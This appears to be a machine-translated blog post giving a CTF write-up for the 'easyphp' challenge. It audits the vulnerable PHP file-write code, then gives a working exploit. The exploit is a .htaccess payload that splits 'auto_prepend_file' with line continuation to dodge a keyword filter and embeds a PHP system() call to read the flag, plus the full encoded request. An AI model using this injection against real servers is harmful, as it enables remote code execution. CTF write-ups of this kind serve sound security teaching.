当前位置:网站首页>[Yangcheng cup 2020] easyphp
[Yangcheng cup 2020] easyphp
2022-07-02 23:02:00 【-Gardenia blue-】
<?php
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
file_put_contents($filename, $content . "\nHello, world");
?>
Code audit
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
If not index.php page , Page data will be deleted
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
} If no incoming content or filename Parameters are directly die
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
Pass in parameters content To filter , Not by on html type flag upload file
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
Pass in parameters filename To filter ,filename Only lowercase letters and . constitute , otherwise die
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
Just like the initial filtering , If not index.php The data will be deleted
file_put_contents($filename, $content . "\nHello, world");
Put our incoming content content write in filename Inside
But notice that there is a splice here Hello world, It will cause our program to report errors
The original idea was filename by a.php,content Pass in a sentence , Result practice :
Discover as html Output directly on the page , There's no resolution , Maybe only parsing is set in the background index.php, After all, the code is right index.php There are many reminders , So I wonder if I can index.php We analyzed our htaccess, Just change the configuration item , So the learning boss learned that he really wanted to use htaccess To get flag
php_value auto_prepend_fil\
e .htaccess
#<?php system('cat /fla?');?>\
htaccess in \ The function of is to splice context , amount to php_value auto_prepend_file.htaccess
Because in order to bypass the filter, from file In the middle
Among them, the use of annotations # Write a sentence into , Because in htaccess Is the function of the annotator , But in php When it comes to execution , In a word, the Trojan horse will be executed
In the third line \ It is for splicing with the last part of the code Hello,world Also as a note , otherwise hello world Go to the fourth line to report an error
?filename=.htaccess&content=php_value%20auto_prepend_fil%5C%0Ae%20.htaccess%0A%23%3C%3Fphp%20system('cat%20/fla?')%3B%3F%3E%5C
边栏推荐
- mysql重置密码,忘记密码,重置root密码,重置mysql密码
- MySQL reset password, forget password, reset root password, reset MySQL password
- Rails 3 activerecord: sort by association count - rails 3 activerecord: order by count on Association
- 地平线2022年4月最新方案介绍
- Jerry's charge unplugged, unable to touch the boot [chapter]
- psnr,ssim,rmse三个指标的定量分析
- `Usage of ${}`
- 性能优化----严苛模式
- Qt QSplitter拆分器
- [chestnut sugar GIS] ArcScene - how to make elevation map with height
猜你喜欢
Jielizhi, production line assembly link [chapter]
Jatpack------LiveData
全面解析分享购商业模式逻辑?分享购是如何赋能企业
性能优化----严苛模式
最小生成树 Minimum Spanning Tree
[chestnut sugar GIS] ArcScene - how to make elevation map with height
Go语言sqlx库操作SQLite3数据库增删改查
Share 10 JS closure interview questions (diagrams), come in and see how many you can answer correctly
[LeetCode] 多数元素【169】
泛型与反射,看这篇就够了
随机推荐
Zhong Xuegao responded that the product will not melt for 1 hour: it contains solid components and cannot melt into water
【硬件】标准阻值的由来
How does Jerry test the wrong touch rate of keys [chapter]
Graphic view frame
Uniapp wechat login returns user name and Avatar
数组进阶提高
[Solved] Splunk: Cannot get username when all users are selected“
antd组件upload上传xlsx文件,并读取文件内容
JS syntax ES6, ES7, es8, es9, ES10, es11, ES12 new features (Abstract)
P1007 single log bridge
手写ORM(对象关系映射)增删改查
数据标注典型案例,景联文科技如何助力企业搭建数据方案
地方经销商玩转社区团购模式,百万运营分享
[LeetCode] 多数元素【169】
Xiaopeng P7 had an accident and the airbag did not pop up. Is this normal?
Jerry's built-in short press and long press, no matter how long it is, it is a short press [chapter]
easyclick,ec权朗网络验证源码
Easyclick, EC Quanlang network verification source code
成功改变splunk 默认URL root path
LeetCode 968. Monitor binary tree